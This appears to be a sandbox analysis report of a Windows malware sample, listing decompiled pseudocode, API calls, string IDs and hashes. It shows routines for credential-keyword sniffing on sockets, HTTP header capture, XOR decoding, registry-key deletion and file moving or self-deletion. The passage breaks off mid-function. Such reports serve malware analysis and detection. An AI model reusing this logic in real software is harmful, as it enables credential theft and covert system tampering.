    											_t105 = _v1600;
    											__eflags = _t105;
    											if(_t105 != 0) {
    												HeapFree( *0x42e6d4, 0, _t105);
    											}
    										}
    										_t102 = _v1616;
    										__eflags = _t102;
    										if(_t102 != 0) {
    											HeapFree( *0x42e6d4, 0, _t102);
    										}
    										__eflags = _t119 - 2;
    										if(_t119 != 2) {
    											__eflags = _t119;
    											if(_t119 != 0) {
    												goto L41;
    											} else {
    												_t78 = _v1628;
    												_t116 = _a4;
    											}
    										} else {
    											_t78 = _v1632;
    											_t116 = _a4;
    										}
    									}
    								}
    							} else {
    								__eflags = _v1588;
    								_t28 = (0 | _v1588 != 0x00000000) - 1; // -1
    								E0040C490(_t28 &  &_v1588, _t151, 0);
    								_t145 = _t116 + 0x122;
    								_t151 =  &_v1592;
    								_t83 = E0040CE60(_t145,  &_v1592);
    								__eflags = _t83;
    								if(_t83 == 0) {
    									L42:
    									_t78 = 0x7530;
    								} else {
    									_t85 = E00418160(_t145);
    									__eflags = _t85 - 0xffffffff;
    									if(_t85 != 0xffffffff) {
    										L12:
    										__eflags = _t139;
    										if(__eflags > 0) {
    											goto L25;
    										} else {
    											if(__eflags < 0) {
    												L15:
    												_t139 =  &_v1588;
    												__eflags = lstrcmpiW(_t145,  &_v1588);
    												if(__eflags == 0) {
    													goto L22;
    												} else {
    													_t151 = E0041CDD0(__eflags, 0x8793aef2, 2);
    													__eflags = _t151;
    													if(_t151 == 0) {
    														goto L42;
    													} else {
    														_t91 = MoveFileExW(_t145,  &_v1588, 0xb);
    														__eflags = _t91;
    														if(_t91 == 0) {
    															goto L42;
    														} else {
    															ReleaseMutex(_t151);
    															CloseHandle(_t151);
    															_t94 = 0;
    															__eflags = _v1588;
    															if(_v1588 != 0) {
    																do {
    																	_t94 = _t94 + 1;
    																	__eflags =  *((short*)(_t157 + 0x40 + _t94 * 2));
    																} while ( *((short*)(_t157 + 0x40 + _t94 * 2)) != 0);
    															}
    															_t96 = E00410820(_t145,  &_v1588, _t94 + _t94);
    															_t139 = 0;
    															__eflags = 0;
    															 *((short*)(_t96 + _t145)) = 0;
    															goto L22;
    														}
    													}
    												}
    											} else {
    												__eflags = _t85 - 0xffffffff;
    												if(_t85 > 0xffffffff) {
    													goto L25;
    												} else {
    													goto L15;
    												}
    											}
    										}
    									} else {
    										__eflags = _t139;
    										if(_t139 == 0) {
    											L25:
    											SetFileAttributesW(_t145, 0x80);
    											DeleteFileW(_t145);
    											goto L42;
    										} else {
    											goto L12;
    										}
    									}
    								}
    							}
    							_t139 =  *0x42edbc;
    							_t79 = WaitForSingleObject(_t139, _t78);
    							__eflags = _t79 - 0x102;
    						} while (_t79 == 0x102);
    						_t151 = _v1624;
    					}
    					ReleaseMutex(_t151);
    					CloseHandle(_t151);
    					HeapFree( *0x42e6d4, 0, _t116);
    					__eflags = 0;
    					return 0;
    				} else {
    					HeapFree( *0x42e6d4, _t59, _t116);
    					_t5 = _t151 + 1; // 0x1
    					return _t5;
    				}
    			}

    APIs
      • Part of subcall function 0041CDD0: CreateMutexW.KERNEL32(0042E930,00000000,?,?,?,?,?), ref: 0041CE18
      • Part of subcall function 0041CDD0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041CE27
      • Part of subcall function 0041CDD0: CloseHandle.KERNEL32(00000000), ref: 0041CE39
    • HeapFree.KERNEL32(?,00000000,?,-78D0C214,00000002), ref: 0040CF19
    • WaitForSingleObject.KERNEL32(?,00000000,?,00000000,0000031C,?,?,00000102), ref: 0040CFE6
    • lstrcmpiW.KERNEL32(?,?,00000000), ref: 0040D060
    • MoveFileExW.KERNEL32(?,?,0000000B,8793AEF2,00000002), ref: 0040D088
    • ReleaseMutex.KERNEL32(00000000), ref: 0040D097
    • CloseHandle.KERNEL32(00000000), ref: 0040D09E
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandleMutexObjectSingleWait$CreateFileFreeHeapMoveReleaselstrcmpi
    • String ID:
    • API String ID: 2718145414-0
    • Opcode ID: b8450cf580a8a9329e3994ad970eb7cea5eeb24c83fb09b19ae8a670dc5e08e7
    • Instruction ID: 64815261c0c6306012076515ce72e43cb13ff191ab19a70270f592cd54a94a66
    • Opcode Fuzzy Hash: b8450cf580a8a9329e3994ad970eb7cea5eeb24c83fb09b19ae8a670dc5e08e7
    • Instruction Fuzzy Hash: CF9104716043019BD324DB64DC84BAB77A9EF89314F040A3EF981EB2D1DB38D945CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E004101F0() {
    				char _v1020;
    				char _v1148;
    				char _v1152;
    				char _v1820;
    				short _v1948;
    				WCHAR* _v1956;
    				char _v2468;
    				short _v2472;
    				short _v2988;
    				short _v2992;
    				WCHAR* _v2996;
    				char _v3038;
    				char _v3058;
    				WCHAR* _v3070;
    				intOrPtr _v3090;
    				char _v3480;
    				char _v3488;
    				char _v3500;
    				char _v3740;
    				char _v3744;
    				char _v3772;
    				short _v3844;
    				char _v3848;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				int _t59;
    				signed int _t60;
    				void* _t63;
    				int _t74;
    				signed int _t76;
    				signed char _t81;
    				CHAR* _t82;
    				WCHAR* _t84;
    				signed int _t87;
    				WCHAR* _t88;
    				signed int _t90;
    				WCHAR* _t91;
    				signed char* _t108;
    				CHAR* _t109;
    				WCHAR* _t111;
    				WCHAR* _t112;
    				WCHAR* _t130;
    				intOrPtr _t138;
    				WCHAR* _t139;
    				char* _t140;
    				signed int _t145;
    				void* _t147;
    
    				_t147 = (_t145 & 0xfffffff8) - 0xf00;
    				_t130 =  &_v2468;
    				E0041D210(1, _t130);
    				PathRemoveFileSpecW(_t130);
    				_v2988 = 0;
    				E0041D150( &_v1948);
    				E00410820( &_v3740,  &_v1820, 0x102);
    				E00412640(E00410820( &_v3488, 0x42eb80, 0x1e6),  &_v3500, 0x1e6);
    				_t59 = 0;
    				if(_v3090 == 0) {
    					L2:
    					_t60 = MultiByteToWideChar(0, 0,  &_v3058, _t59,  &_v3844, 0x32);
    					if(_t60 >= 0x32) {
    						_t60 = 0;
    					}
    					 *((short*)(_t147 + 0x10 + _t60 * 2)) = 0;
    					if(_t60 == 0) {
    						L11:
    						PathRemoveFileSpecW( &_v2988);
    						 *0x42e8f8 =  *0x42e8f8 | 0x00000002;
    						SetEvent( *0x42edbc);
    						_t63 =  *0x42edc0;
    						__eflags = _t63 - 0xffffffff;
    						if(__eflags != 0) {
    							WaitForSingleObject(_t63, 0xffffffff);
    						}
    						E0040ED80(__eflags);
    						E004185D0( &_v2468);
    						E004185D0( &_v2988);
    						_v1948 = 0;
    						E0041D150( &_v1148);
    						E00410820( &_v3740,  &_v1020, 0x102);
    						E00412640( &_v3740, E00410820( &_v3488, 0x42eb80, 0x1e6), 0x1e6);
    						_t74 = 0;
    						__eflags = _v3070;
    						if(_v3070 == 0) {
    							L15:
    							_t76 = MultiByteToWideChar(0, 0,  &_v3038, _t74,  &_v3844, 0x32);
    							__eflags = _t76 - 0x32;
    							if(_t76 >= 0x32) {
    								_t76 = 0;
    								__eflags = 0;
    							}
    							 *((short*)(_t147 + 0x10 + _t76 * 2)) = 0;
    							__eflags = _t76;
    							if(_t76 == 0) {
    								L24:
    								SHDeleteKeyW(0x80000001,  &_v1948);
    								CharToOemW( &_v2472,  &_v3480);
    								CharToOemW( &_v2992,  &_v3744);
    								_t138 =  *0x401b54; // 0x4049e8
    								_t108 =  &_v3848;
    								_t81 = 0;
    								_t139 = _t138 - _t108;
    								__eflags = _t139;
    								do {
    									 *_t108 =  *(_t139 + _t108) ^ _t81 ^ 0x00000046;
    									_t81 = _t81 + 1;
    									_t108 =  &(_t108[1]);
    									__eflags = _t81 - 0x4c;
    								} while (_t81 < 0x4c);
    								_t82 =  &_v3744;
    								_push(_t82);
    								_t109 =  &_v3480;
    								_push(_t109);
    								_push(_t82);
    								_push(_t109);
    								_t140 =  &_v1152;
    								_v3772 = 0;
    								_t84 = E00411D70(_t109, 0x474, _t140,  &_v3848);
    								__eflags = _t84;
    								if(_t84 > 0) {
    									_push(_t140);
    									E00412E80();
    								}
    								__eflags =  *0x42edc0 - 0xffffffff;
    								if( *0x42edc0 != 0xffffffff) {
    									return 1;
    								} else {
    									ExitProcess(0);
    								}
    							} else {
    								_t111 =  &_v3844;
    								while(1) {
    									_t87 =  *_t111 & 0x0000ffff;
    									__eflags = _t87 - 0x5c;
    									if(_t87 == 0x5c) {
    										goto L21;
    									}
    									__eflags = _t87 - 0x2f;
    									if(_t87 != 0x2f) {
    										_t88 = PathCombineW( &_v1948, L"SOFTWARE\\Microsoft", _t111);
    										__eflags = _t88;
    										if(_t88 == 0) {
    											_v1956 = _t88;
    										}
    										goto L24;
    									}
    									L21:
    									_t111 =  &(_t111[1]);
    								}
    							}
    						} else {
    							do {
    								_t74 = _t74 + 1;
    								__eflags =  *((char*)(_t147 + _t74 + 0x336));
    							} while ( *((char*)(_t147 + _t74 + 0x336)) != 0);
    							goto L15;
    						}
    					}
    					_t112 =  &_v3844;
    					while(1) {
    						_t90 =  *_t112 & 0x0000ffff;
    						if(_t90 != 0x5c && _t90 != 0x2f) {
    							break;
    						}
    						_t112 =  &(_t112[1]);
    					}
    					_t91 = PathCombineW( &_v2988, 0x42e958, _t112);
    					__eflags = _t91;
    					if(_t91 == 0) {
    						_v2996 = _t91;
    					}
    					goto L11;
    				} else {
    					goto L1;
    				}
    				do {
    					L1:
    					_t59 = _t59 + 1;
    				} while ( *((char*)(_t147 + _t59 + 0x322)) != 0);
    				goto L2;
    			}

    APIs
    • PathRemoveFileSpecW.SHLWAPI(?,?,00000000), ref: 0041021A
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000032,?,000001E6,?,0042EB80,000001E6,?,?,00000102), ref: 004102A7
    • PathCombineW.SHLWAPI(?,0042E958,?), ref: 004102E5
    • PathRemoveFileSpecW.SHLWAPI(?), ref: 004102FB
    • SetEvent.KERNEL32(?), ref: 0041030B
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041031E
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000032,00000000,000001E6,?,0042EB80,000001E6,?,?,00000102), ref: 004103C1
    • PathCombineW.SHLWAPI(?,SOFTWARE\Microsoft,?), ref: 00410400
    • SHDeleteKeyW.SHLWAPI(80000001,?), ref: 0041041B
    • CharToOemW.USER32 ref: 00410437
    • CharToOemW.USER32 ref: 00410446
    • ExitProcess.KERNEL32 ref: 004104B2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CharPath$ByteCombineFileMultiRemoveSpecWide$DeleteEventExitObjectProcessSingleWait
    • String ID: SOFTWARE\Microsoft$I@
    • API String ID: 1626940994-3897302188
    • Opcode ID: f60a68b339af97d299d4a00cf4313e59deb5c4f4410d293b0e509c09cc9375f0
    • Instruction ID: 6db825f7d904601bcc1a3abfa4745a85e688a03431ff905cfe5ce3cf0b046a67
    • Opcode Fuzzy Hash: f60a68b339af97d299d4a00cf4313e59deb5c4f4410d293b0e509c09cc9375f0
    • Instruction Fuzzy Hash: 8571F471508340ABD334E775DC85BEB73E8AF88304F004E2EF599D2191EAB8A9C5C75A
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32 ref: 0041A6D6
    • connect.WS2_32(00000000,00000002,-0000001D), ref: 0041A6FC
    • closesocket.WS2_32(00000000), ref: 0041A707
    • setsockopt.WS2_32(00000000,00000006,00000001,00000001,00000004), ref: 0041A731
    • setsockopt.WS2_32(00000000,00000006,00000001,?,00000004), ref: 0041A76E
    • WSAIoctl.WS2_32(00000000,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 0041A7A2
    • send.WS2_32(00000000,00000000,00000005,00000000), ref: 0041A7C5
    • send.WS2_32(00000000,?,00000004,00000000), ref: 0041A7D5
    • shutdown.WS2_32(00000000,00000002), ref: 0041A807
    • closesocket.WS2_32(00000000), ref: 0041A80E
    • shutdown.WS2_32(?,00000002), ref: 0041A820
    • closesocket.WS2_32 ref: 0041A827
    • HeapFree.KERNEL32(?,00000000,?), ref: 0041A837
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: closesocket$sendsetsockoptshutdown$FreeHeapIoctlconnectsocket
    • String ID: p0u
    • API String ID: 365435346-1742372003
    • Opcode ID: c320382269384521bc3b2b4cd832ade2ccd49376224eea5c7801224949aa6cf3
    • Instruction ID: 51c87355226266dfec6c8b2a64d1bf199c8783f4f0f7c79dfd6288198f99362c
    • Opcode Fuzzy Hash: c320382269384521bc3b2b4cd832ade2ccd49376224eea5c7801224949aa6cf3
    • Instruction Fuzzy Hash: 0A51A4711043006BD310AF69CD89F6B77A8ABC9724F104B1DF266D72E1D7789886C76A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E0041DFE0(void* __eax, intOrPtr _a4, signed int* _a8) {
    				char _v536;
    				char _v652;
    				char _v664;
    				char _v696;
    				char _v700;
    				signed char _v701;
    				char _v708;
    				signed char _v713;
    				void* __edi;
    				void* __esi;
    				signed int _t48;
    				short _t50;
    				short _t51;
    				signed int _t59;
    				short _t60;
    				signed int _t64;
    				signed int _t66;
    				void* _t67;
    				void* _t81;
    				signed char _t83;
    				intOrPtr _t85;
    				void* _t88;
    				intOrPtr* _t94;
    				signed int _t96;
    				short _t97;
    				intOrPtr _t98;
    				void* _t104;
    				void* _t105;
    				intOrPtr _t108;
    				short _t110;
    				signed int* _t115;
    				signed short* _t119;
    				signed int* _t120;
    				intOrPtr* _t121;
    
    				_t108 = _a4;
    				_t81 = __eax;
    				if(_t108 == 0xffffffff) {
    					L60:
    					__eflags = 0;
    					return 0;
    				} else {
    					_t115 = _a8;
    					if(_t115 == 0 || __eax > 0x200) {
    						goto L60;
    					} else {
    						if(__eax <= 6) {
    							L22:
    							__eflags = _t81 - 1;
    							if(_t81 > 1) {
    								EnterCriticalSection(0x42edc4);
    								_t110 = E0041DE60(_t108);
    								__eflags = _t110;
    								if(_t110 != 0) {
    									__eflags =  *((intOrPtr*)(_t110 + 4));
    									if( *((intOrPtr*)(_t110 + 4)) == 0) {
    										L58:
    										E0041DF50(_t45, 0);
    									} else {
    										__eflags =  *((intOrPtr*)(_t110 + 8));
    										if( *((intOrPtr*)(_t110 + 8)) == 0) {
    											goto L58;
    										} else {
    											__eflags = _t81 - 3;
    											if(_t81 < 3) {
    												L31:
    												__eflags = _t81 - 4;
    												if(_t81 >= 4) {
    													_t48 =  *_t115 ^ 0x02020000;
    													__eflags = _t48 - 0x47525954;
    													if(_t48 == 0x47525954) {
    														goto L35;
    													} else {
    														__eflags = _t48 - 0x56434546;
    														if(_t48 == 0x56434546) {
    															goto L35;
    														} else {
    															__eflags = _t48 - 0x54514150;
    															if(_t48 != 0x54514150) {
    																__eflags = _t48 - 0x56435453;
    																if(_t48 == 0x56435453) {
    																	L38:
    																	_t83 = 0x65;
    																	_t88 = 0x15;
    																	goto L39;
    																} else {
    																	__eflags = _t48 - 0x5651494c;
    																	if(_t48 == 0x5651494c) {
    																		goto L38;
    																	}
    																}
    															} else {
    																goto L35;
    															}
    														}
    													}
    												}
    											} else {
    												_t64 =  *_t115;
    												__eflags = _t64 - 0x43;
    												if(_t64 == 0x43) {
    													L29:
    													__eflags = _t115[0] - 0x57;
    													if(_t115[0] != 0x57) {
    														goto L31;
    													} else {
    														__eflags = _t115[0] - 0x44;
    														if(_t115[0] == 0x44) {
    															L35:
    															_t83 = 0x64;
    															_t88 = 0x14;
    															L39:
    															_v701 = _t83;
    															E00424100(_t88,  &_v696);
    															_t50 =  &_v700;
    															_v700 = 0x80;
    															__imp__#5(_a4,  &_v652, _t50);
    															__eflags = _t50;
    															if(_t50 == 0) {
    																_t51 = E004153C0( &_v664);
    																__eflags = _t51;
    																if(_t51 == 0) {
    																	__eflags = _t83 - 0x65;
    																	if(_t83 == 0x65) {
    																		L56:
    																		E00415370( &_v664,  &_v536);
    																		E00424100(0x13,  &_v696);
    																		_push( &_v536);
    																		_push( *((intOrPtr*)(_t110 + 8)));
    																		_push( *((intOrPtr*)(_t110 + 4)));
    																		E0040D910(__eflags, _t83 & 0x000000ff, 0, 0,  &_v696,  &_v708);
    																	} else {
    																		__eflags = _t83 - 0x64;
    																		if(_t83 == 0x64) {
    																			_t119 =  &_v696;
    																			E00424100(0x16, _t119);
    																			_t94 =  *((intOrPtr*)(_t110 + 4));
    																			__eflags = _t94;
    																			if(_t94 == 0) {
    																				goto L56;
    																			} else {
    																				_t59 = 0;
    																				__eflags =  *_t94;
    																				if( *_t94 == 0) {
    																					L52:
    																					_t60 = _t59 + 0xfffffff7;
    																					__eflags = _t60;
    																					if(_t60 != 0) {
    																						goto L55;
    																					}
    																				} else {
    																					do {
    																						_t59 = _t59 + 1;
    																						__eflags =  *((short*)(_t94 + _t59 * 2));
    																					} while ( *((short*)(_t94 + _t59 * 2)) != 0);
    																					__eflags = _t59 - 9;
    																					if(_t59 != 9) {
    																						goto L52;
    																					} else {
    																						_t104 = 0;
    																						_t97 = _t94 -  &_v696;
    																						__eflags = _t97;
    																						while(1) {
    																							_t60 = ( *(_t97 + _t119) & 0x0000ffff) - ( *_t119 & 0x0000ffff);
    																							__eflags = _t60;
    																							if(_t60 != 0) {
    																								break;
    																							}
    																							_t104 = _t104 + 1;
    																							_t119 =  &(_t119[1]);
    																							__eflags = _t104 - 9;
    																							if(_t104 < 9) {
    																								continue;
    																							} else {
    																							}
    																							goto L57;
    																						}
    																						_t83 = _v713;
    																						L55:
    																						__eflags = _t60;
    																						_t96 = 0 | _t60 > 0x00000000;
    																						_t35 = _t96 - 1; // -1
    																						__eflags = _t96 + _t35;
    																						if(_t96 + _t35 != 0) {
    																							goto L56;
    																						}
    																					}
    																				}
    																			}
    																		}
    																	}
    																}
    															}
    															L57:
    															_t45 = _t110;
    															goto L58;
    														} else {
    															goto L31;
    														}
    													}
    												} else {
    													__eflags = _t64 - 0x50;
    													if(_t64 != 0x50) {
    														goto L31;
    													} else {
    														goto L29;
    													}
    												}
    											}
    										}
    									}
    								}
    								LeaveCriticalSection(0x42edc4);
    							}
    							goto L60;
    						} else {
    							_t66 =  *_t115 ^ 0x02020000;
    							if(_t66 == 0x50475355 || _t66 == 0x51514150) {
    								if(_t115[1] != 0x20) {
    									goto L22;
    								} else {
    									_t105 = _t81 - 5;
    									_t120 =  &(_t115[1]);
    									_t67 = 0;
    									if(_t105 == 0) {
    										goto L60;
    									} else {
    										while(1) {
    											_t98 =  *((intOrPtr*)(_t67 + _t120));
    											if(_t98 == 0xd || _t98 == 0xa) {
    												break;
    											}
    											if(_t98 < 0x20) {
    												goto L60;
    											} else {
    												_t67 = _t67 + 1;
    												if(_t67 < _t105) {
    													continue;
    												} else {
    													break;
    												}
    											}
    											goto L61;
    										}
    										if(_t67 == 0 || _t67 == _t105) {
    											goto L60;
    										} else {
    											_t85 = E00410AA0(_t120, 0xfde9, _t67);
    											if(_t85 == 0) {
    												goto L60;
    											} else {
    												_v701 = 0;
    												EnterCriticalSection(0x42edc4);
    												_t121 = E0041DE60(_t108);
    												if(_t121 != 0) {
    													L18:
    													__eflags =  *_a8 - 0x55;
    													_v701 = 1;
    													if( *_a8 != 0x55) {
    														E004107C0( *((intOrPtr*)(_t121 + 8)));
    														 *((intOrPtr*)(_t121 + 8)) = _t85;
    													} else {
    														E0041DF50(_t121, 1);
    														 *((intOrPtr*)(_t121 + 4)) = _t85;
    													}
    													 *_t121 = _t108;
    													LeaveCriticalSection(0x42edc4);
    													return _v701;
    												} else {
    													_t121 = E0041DEA0(_t108);
    													if(_t121 != 0) {
    														goto L18;
    													} else {
    														E004107C0(_t85);
    														LeaveCriticalSection(0x42edc4);
    														return _v701;
    													}
    												}
    											}
    										}
    									}
    								}
    							} else {
    								goto L22;
    							}
    						}
    					}
    				}
    				L61:
    			}





































    APIs
    • EnterCriticalSection.KERNEL32(0042EDC4,0000FDE9,00000000), ref: 0041E09A
    • LeaveCriticalSection.KERNEL32(0042EDC4,?), ref: 0041E0C5
    • LeaveCriticalSection.KERNEL32(0042EDC4), ref: 0041E107
      • Part of subcall function 0041DF50: HeapFree.KERNEL32(?,00000000,?,00000000,?,0041E2B4,00000000), ref: 0041DF70
      • Part of subcall function 0041DF50: HeapFree.KERNEL32(?,00000000,?,00000000,?,0041E2B4,00000000), ref: 0041DF8A
    • EnterCriticalSection.KERNEL32(0042EDC4), ref: 0041E128
    • getpeername.WS2_32 ref: 0041E1D6
    • LeaveCriticalSection.KERNEL32(0042EDC4), ref: 0041E2B9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$Leave$EnterFreeHeap$getpeername
    • String ID: FECV$LIQV$PAQQ$PAQT$STCV$TYRG$USGP
    • API String ID: 4104136926-2432391943
    • Opcode ID: f8f77f2734e122a3e2ab1d3d4739160017604c2035acbf7cfad3455cc20ded3d
    • Instruction ID: 3279819f0b30b65da2df542c74215665110b0bcb0be343f9717d662c2d23d26e
    • Opcode Fuzzy Hash: f8f77f2734e122a3e2ab1d3d4739160017604c2035acbf7cfad3455cc20ded3d
    • Instruction Fuzzy Hash: FC7177396003519AEB309A27CC94BEB7B95AF96300F14496FEC859B391C67DCCC1838E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040B920(intOrPtr* __edi, void* _a4) {
    				void _v12;
    				long _v32;
    				void _v48;
    				void _v52;
    				char _v64;
    				intOrPtr _v68;
    				void* _v72;
    				void* _v76;
    				void* __ebx;
    				void* __esi;
    				void* _t31;
    				int _t33;
    				char _t38;
    				void* _t39;
    				void* _t44;
    				long _t48;
    				void _t55;
    				long _t58;
    				long _t65;
    				void* _t72;
    				void* _t73;
    				void* _t75;
    				intOrPtr _t82;
    				intOrPtr _t83;
    				char* _t87;
    				DWORD* _t88;
    				DWORD* _t89;
    				DWORD* _t90;
    				void* _t92;
    
    				_t87 = __edi;
    				_t92 = _a4;
    				E00410870(_t31, __edi, 0, 0x48);
    				_t88 = __edi + 0xc;
    				 *((intOrPtr*)(__edi)) = 1;
    				 *(__edi + 4) = _t92;
    				 *_t88 = 0;
    				_t33 = InternetQueryOptionA(_t92, 0x22, 0, _t88);
    				if(_t33 != 0 ||  *_t88 <= _t33 || GetLastError() != 0x7a) {
    					L7:
    					_t72 = 0;
    				} else {
    					_t65 =  *_t88;
    					if(_t65 == 0) {
    						goto L7;
    					} else {
    						_t72 = HeapAlloc( *0x42e6d4, 8, _t65 + 4);
    						if(_t72 == 0) {
    							goto L7;
    						} else {
    							if(InternetQueryOptionA(_t92, 0x22, _t72, _t88) != 1) {
    								E004107C0(_t72);
    								goto L7;
    							}
    						}
    					}
    				}
    				 *(_t87 + 8) = _t72;
    				if(_t72 != 0) {
    					_t89 = _t87 + 0x14;
    					 *_t89 = 0;
    					if(HttpQueryInfoA(_t92, 0x80000023,  &_v12, _t89, 0) != 0 || GetLastError() != 0x7a) {
    						L16:
    						_t73 = 0;
    					} else {
    						_t58 =  *_t89;
    						if(_t58 == 0) {
    							goto L16;
    						} else {
    							_t73 = HeapAlloc( *0x42e6d4, 8, _t58 + 4);
    							if(_t73 == 0) {
    								goto L16;
    							} else {
    								if(HttpQueryInfoA(_t92, 0x80000023, _t73, _t89, 0) != 1) {
    									E004107C0(_t73);
    									goto L16;
    								}
    							}
    						}
    					}
    					 *(_t87 + 0x10) = _t73;
    					_v32 = 9;
    					if(HttpQueryInfoA(_t92, 0x2d,  &_v48,  &_v32, 0) != 1) {
    						L25:
    						_t90 = _t87 + 0x20;
    						 *_t90 = 0;
    						if(HttpQueryInfoA(_t92, 0x80000001,  &_v52, _t90, 0) != 0 || GetLastError() != 0x7a) {
    							L31:
    							_t75 = 0;
    						} else {
    							_t48 =  *_t90;
    							if(_t48 == 0) {
    								goto L31;
    							} else {
    								_t75 = HeapAlloc( *0x42e6d4, 8, _t48 + 4);
    								if(_t75 == 0) {
    									goto L31;
    								} else {
    									if(HttpQueryInfoA(_t92, 0x80000001, _t75, _t90, 0) != 1) {
    										E004107C0(_t75);
    										goto L31;
    									}
    								}
    							}
    						}
    						_t38 = _v64;
    						 *(_t87 + 0x1c) = _t75;
    						if(_t38 - 1 <= 0xfffff) {
    							_t82 = _v68;
    							if(_t82 != 0) {
    								 *((intOrPtr*)(_t87 + 0x24)) = _t82;
    								 *((intOrPtr*)(_t87 + 0x28)) = _t38;
    							}
    						}
    						_t39 = E00413740(0x1c,  &_v64, _t92);
    						_v76 = _t39;
    						if(_t39 != 0) {
    							if( *_t39 == 0) {
    								L42:
    								HeapFree( *0x42e6d4, 0, _t39);
    							} else {
    								_t44 = E00413740(0x1d,  &_v64, _t92);
    								if(_t44 == 0) {
    									L41:
    									_t39 = _v72;
    									goto L42;
    								} else {
    									if( *_t44 == 0) {
    										HeapFree( *0x42e6d4, 0, _t44);
    										goto L41;
    									} else {
    										 *(_t87 + 0x2c) = _v72;
    										 *(_t87 + 0x30) = _t44;
    									}
    								}
    							}
    						}
    						 *((intOrPtr*)(_t87 + 0x40)) = E00423A90();
    						 *((intOrPtr*)(_t87 + 0x44)) = E0040C250();
    						return 1;
    					} else {
    						_t55 = _v52;
    						if(_t55 <= 1) {
    							goto L25;
    						} else {
    							_t83 = _v68;
    							if(_t83 != 0x50) {
    								if(_t83 != 0x47 || _t55 != 3) {
    									goto L9;
    								} else {
    									 *((char*)(_t87 + 0x18)) = 0;
    									goto L25;
    								}
    							} else {
    								if(_t55 != 4) {
    									goto L9;
    								} else {
    									 *((char*)(_t87 + 0x18)) = 1;
    									goto L25;
    								}
    							}
    						}
    					}
    				} else {
    					L9:
    					return 0;
    				}
    			}

    APIs
    • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0040B94C
    • GetLastError.KERNEL32 ref: 0040B95A
    • HeapAlloc.KERNEL32(?,00000008,-00000004), ref: 0040B977
    • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0040B988
      • Part of subcall function 004107C0: HeapFree.KERNEL32(?,00000000,00000000,004078C3,00000000), ref: 004107CD
    • HttpQueryInfoA.WININET(?,80000023,?,?,00000000), ref: 0040B9C5
    • GetLastError.KERNEL32 ref: 0040B9CF
    • HeapAlloc.KERNEL32(?,00000008,-00000004), ref: 0040B9ED
    • HttpQueryInfoA.WININET(?,80000023,00000000,?,00000000), ref: 0040BA03
    • HttpQueryInfoA.WININET ref: 0040BA37
    • HttpQueryInfoA.WININET(?,80000001,?,?,00000000), ref: 0040BA8C
    • GetLastError.KERNEL32 ref: 0040BA92
    • HeapAlloc.KERNEL32(?,00000008,-00000004), ref: 0040BAAF
    • HttpQueryInfoA.WININET(?,80000001,00000000,?,00000000), ref: 0040BAC5
    • HeapFree.KERNEL32(?,00000000,00000000,?,?), ref: 0040BB40
    • HeapFree.KERNEL32(?,00000000,00000000,?), ref: 0040BB54
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Query$Heap$HttpInfo$AllocErrorFreeLast$InternetOption
    • String ID:
    • API String ID: 1236818155-0
    • Opcode ID: 8ea8a25ecf8a2ec7e121124140c5a7a401ef8cb20629d75bcd122bb7ddab85b8
    • Instruction ID: bdc738c9fde4204af2ee63a823107a008bd6c73fae90c637e61984cbeeec0d20
    • Opcode Fuzzy Hash: 8ea8a25ecf8a2ec7e121124140c5a7a401ef8cb20629d75bcd122bb7ddab85b8
    • Instruction Fuzzy Hash: F2617C70600302ABE7209FA5DD84B67B7A8EB54704F50443AFA45F66D0DB78E944CBAD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00426A90(struct HWND__* _a4, signed short _a8) {
    				struct tagRECT _v20;
    				int _v24;
    				signed short _t29;
    				int _t40;
    				BYTE* _t41;
    				signed int _t46;
    				signed short _t47;
    				signed int _t56;
    				int _t58;
    				struct HWND__* _t59;
    				struct HMENU__* _t60;
    				signed short _t61;
    				int _t74;
    				int _t75;
    				struct HMENU__* _t78;
    				struct HWND__* _t79;
    				void* _t83;
    
    				_t29 = _a8;
    				_push(_t56);
    				_t83 = _t29 - 0xfffffffd;
